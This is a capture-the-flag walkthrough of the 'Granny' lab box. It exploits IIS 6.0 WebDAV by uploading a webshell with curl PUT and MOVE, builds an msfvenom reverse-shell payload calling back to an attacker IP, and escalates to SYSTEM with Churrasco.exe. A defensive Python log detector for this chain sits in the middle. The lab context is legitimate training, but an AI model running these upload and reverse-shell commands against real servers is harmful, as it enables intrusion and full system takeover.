
Granny


Last updated 4 years ago


Overview

Initial Foothold : Microsoft IIS 6.0 exploitation (CVE-2017-7269) or WebDAV PUT/MOVE file upload

Privilege Escalation : SeImpersonatePrivilege abuse using Churrasco.exe

Enumeration

Starting with port scanning

Port Scanning


PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 25 Jun 2020 16:49:55 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%)

From the full nmap scan we found that port 80 is running Microsoft IIS 6.0.

We can also observe that the PUT method is allowed, which lets us place files on the web server.

Test this functionality using the davtest command.

The result above confirms that we can put files on the server.

Confirm this by executing the uploaded file.

We also found an exploit for the IIS 6.0 web server.

Summary

Files can be uploaded to the web server.

Exploits are available for the vulnerable web server.

Exploitation

Using Exploit of IIS 6.0

Use the exploit from the GitHub repo linked at the bottom of the page to exploit this vulnerability.

Launch a listener on port 4444.

Execute the exploit.

The exploit completed successfully and we got a shell.

Using PUT method

Using curl we will put a webshell on the server.

But we can't PUT .aspx files on the web server directly.

So first put a text file on the server and then rename it to .aspx using the MOVE method, which is allowed.

First PUT the text version of cmdasp.aspx (cmdasp.txt) on the web server using curl:

kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file cmdasp.txt

Now use curl again to MOVE the file from cmdasp.txt to cmdasp.aspx:

curl -X MOVE --header "Destination:http://10.10.10.15/cmdasp.aspx" http://10.10.10.15/cmdasp.txt

We now have command execution through the webshell.

Let's try to get a reverse shell.

First generate a reverse shell payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f exe > shell.exe

Then upload the shell using the same PUT-then-MOVE method as above:

kali@kali:~/htb/10.10.10.15$ curl http://10.10.10.15/ --upload-file shell.txt
kali@kali:~/htb/10.10.10.15$ curl -X MOVE --header "Destination:http://10.10.10.15/shell.exe" http://10.10.10.15/shell.txt

We got back the reverse shell
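Since this whole foothold rests on WebDAV letting a client PUT a harmless-looking .txt file and then MOVE it to a script extension, the defender-side view is worth spelling out. The following is an added example (my own code, not from this writeup or from any tool it uses) that parses IIS W3C extended log lines and flags exactly that sequence: a successful PUT, followed from the same client by a MOVE of the same path and a request for a file with the same basename but a script extension. The log lines are constructed to mirror the steps above, and the field layout assumes IIS's default W3C fields.

```python
import posixpath
from datetime import datetime, timedelta

# Constructed IIS W3C extended log sample (not taken from the box). The first
# client reproduces the PUT -> MOVE -> GET chain from the writeup; the second
# only uploads a text file; the third client's PUT is refused.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-06-25 16:50:01 10.10.10.15 GET /index.htm - 80 - 10.10.14.10 Mozilla/5.0 200 0 0
2020-06-25 16:50:05 10.10.10.15 PUT /cmdasp.txt - 80 - 10.10.14.10 curl/7.68.0 201 0 0
2020-06-25 16:50:09 10.10.10.15 MOVE /cmdasp.txt - 80 - 10.10.14.10 curl/7.68.0 201 0 0
2020-06-25 16:50:15 10.10.10.15 GET /cmdasp.aspx - 80 - 10.10.14.10 Mozilla/5.0 200 0 0
2020-06-25 16:51:00 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.20 curl/7.68.0 201 0 0
2020-06-25 16:51:30 10.10.10.15 PUT /other.txt - 80 - 10.10.14.30 curl/7.68.0 403 0 0
"""

# Extensions that IIS will execute rather than serve as static content.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".exe", ".dll"}
# How long after a PUT we still correlate a MOVE or execution from the same client.
WINDOW = timedelta(minutes=5)


def parse_iis_log(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software or #Date
        if fields is None:
            raise ValueError("data line appears before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip a malformed line instead of mis-assigning columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        rec["sc-status"] = int(rec["sc-status"])
        records.append(rec)
    return records


def find_webdav_uploads(records, window=WINDOW):
    """Flag successful PUTs and correlate them with a later MOVE and script execution."""
    by_client = {}
    for r in records:
        by_client.setdefault(r["c-ip"], []).append(r)

    findings = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        for i, put in enumerate(recs):
            if put["cs-method"] != "PUT" or not 200 <= put["sc-status"] < 300:
                continue
            stem = put["cs-uri-stem"]
            base = posixpath.splitext(stem)[0]
            finding = {"client": client, "uploaded": stem, "ts": put["ts"],
                       "moved": False, "executed": None}
            for later in recs[i + 1:]:
                if later["ts"] - put["ts"] > window:
                    break
                ok = 200 <= later["sc-status"] < 300
                later_base, later_ext = posixpath.splitext(later["cs-uri-stem"])
                if later["cs-method"] == "MOVE" and later["cs-uri-stem"] == stem and ok:
                    finding["moved"] = True  # the uploaded file was renamed server-side
                elif (later["cs-method"] in ("GET", "POST") and later_base == base
                      and later_ext.lower() in SCRIPT_EXTS):
                    finding["executed"] = later["cs-uri-stem"]  # same basename, now executable
            # A bare PUT is suspicious; PUT plus MOVE or execution is the full chain.
            finding["severity"] = "high" if finding["moved"] or finding["executed"] else "medium"
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_webdav_uploads(parse_iis_log(SAMPLE_LOG)):
        print(f"[{f['severity']}] {f['client']} uploaded {f['uploaded']} at {f['ts']}"
              f" moved={f['moved']} executed={f['executed']}")
```

Note that the default IIS log fields do not record the Destination header of a MOVE, so the correlation uses the shared basename of the later request rather than the header; if you enable logging of that header, the match can be made exact. Disallowing PUT, MOVE and the other WebDAV verbs on a site that does not need them removes the chain entirely.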

Privilege Escalation

After getting a shell as a service account, always check the privileges of that account.

In this case SeImpersonatePrivilege was enabled, which we can exploit to gain a SYSTEM shell.

Let's use the Churrasco.exe exploit from the GitHub repo linked at the bottom of the page.

Transfer this binary along with the reverse shell binary to the target host using FTP.

After trying many other ways of transferring the exploit, FTP successfully uploaded it.

Create a text file on the Windows target which contains the FTP commands.

Now execute this in ftp using

This downloaded the required files to the target host.

C:\WINDOWS\Temp>churrasco.exe -d c:\windows\temp\shell.exe

Got the SYSTEM shell.

That's all for this box.

Good Bye :)

GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269 (https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)
GitHub - Re4son/Churrasco: Changes for Visual Studio 2013 (https://github.com/Re4son/Churrasco)